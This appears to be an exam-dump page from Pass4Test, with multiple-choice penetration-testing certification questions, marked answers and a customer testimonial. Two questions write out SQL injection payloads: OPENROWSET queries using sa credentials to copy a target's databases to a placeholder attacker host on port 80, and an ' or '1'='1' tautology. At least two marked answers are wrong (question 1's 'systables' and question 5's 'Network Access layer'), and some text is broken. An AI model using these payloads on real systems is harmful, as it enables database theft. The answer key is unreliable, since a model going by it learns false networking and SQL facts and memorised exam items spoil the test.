A penetration tester tries to transfer the database from the target machine to a different machine. For this, he uses OPENROWSET to link the target database to his own database, replicates the database structure, and transfers the data to his machine by via a connection to the remote machine on port 80.
The query he used to transfer databases was:
'; insert into OPENROWSET ('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from mydatabase..hacked_sysdatabases') select * from master.dbo.sysdatabases -
The query he used to transfer table 1 was:
'; insert into OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from mydatabase..table1') select * from database..table1 -
What query does he need in order to transfer the column?
A. '; insert into OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,8 0;','select * from mydatabase..hacked_syscolumns') select * from user_tables.dbo.syscolumns -
B. '; insert into OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,8 0;','select * from mydatabase..hacked_syscolumns') select * from user_database.dbo.syscolumns -
C. '; insert into OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,8 0;','select * from mydatabase..hacked_syscolumns') select * from user_database.dbo.sysrows -
D. '; insert into OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,8 0;','select * from mydatabase..hacked_syscolumns') select * from user_database.dbo.systables -
正解:D
質問 2:
Identify the person who will lead the penetration-testing project and be the client point of contact.
A. Chief Penetration Tester
B. Application Penetration Tester
C. Database Penetration Tester
D. Policy Penetration Tester
正解:A
解説: (Pass4Test メンバーにのみ表示されます)
質問 3:
Due to illegal inputs, various types of TCP stacks respond in a different manner. Some IDSs do not take into account the TCP protocol's urgency feature, which could allow testers to evade the IDS.
Penetration tester needs to try different combinations of TCP flags (e.g. none, SYN/FIN, SYN/RST, SYN/FIN/ACK, SYN/RST/ACK, and All Flags) to test the IDS.
Which of the following TCP flag combinations combines the problem of initiation, midstream, and termination flags with the PSH and URG?
A. SYN/RST/ACK
B. SYN/FIN
C. SYN/FIN/ACK
D. All Flags
正解:D
解説: (Pass4Test メンバーにのみ表示されます)
質問 4:
Identify the type of firewall represented in the diagram below:
A. Circuit level gateway
B. Packet filter
C. Application level gateway
D. Stateful multilayer inspection firewall
正解:C
解説: (Pass4Test メンバーにのみ表示されます)
質問 5:
TCP/IP model is a framework for the Internet Protocol suite of computer network protocols that defines the communication in an IP-based network. It provides end-to-end connectivity specifying how data should be formatted, addressed, transmitted, routed and received at the destination. This functionality has been organized into four abstraction layers which are
used to sort all related protocols according to the scope of networking involved.
Which of the following TCP/IP layers selects the best path through the network for packets to travel?
A. Internet layer
B. Application layer
C. Network Access layer
D. Transport layer
正解:C
質問 6:
A WHERE clause in SQL specifies that a SQL Data Manipulation Language (DML) statement should only affect rows that meet specified criteria. The criteria are expressed in the form of predicates. WHERE clauses are not mandatory clauses of SQL DML statements, but can be used to limit the number of rows affected by a SQL DML statement or returned by a query.
A pen tester is trying to gain access to a database by inserting exploited query statements with a WHERE clause. The pen tester wants to retrieve all the entries from the database using the WHERE clause from a particular table (e.g. StudentTable).
What query does he need to write to retrieve the information?
A. RETRIVE * FROM StudentTable WHERE roll_number = 1'#
B. DUMP * FROM StudentTable WHERE roll_number = 1 AND 1=1-
C. EXTRACT* FROM StudentTable WHERE roll_number = 1 order by 1000
D. SELECT * FROM StudentTable WHERE roll_number = '' or '1' = '1'
正解:D
質問 7:
The amount of data stored in organizational databases has increased rapidly in recent years due to the rapid advancement of information technologies. A high percentage of these data is sensitive, private and critical to the organizations, their clients and partners.
Therefore, databases are usually installed behind internal firewalls, protected with intrusion detection mechanisms and accessed only by applications. To access a database, users have to connect to one of these applications and submit queries through them to the database. The threat to databases arises when these applications do not behave properly and construct these queries without sanitizing user inputs first.
Identify the injection attack represented in the diagram below:
A. XPath Injection Attack
B. LDAP Injection Attack
C. Frame Injection Attack
D. SOAP Injection Attack
正解:B
解説: (Pass4Test メンバーにのみ表示されます)
喜屋** -
二回目で合格することができました。カスタマーサービスのアドバイス通りに勉強したことで、合格することができました。どうもありがとうございました。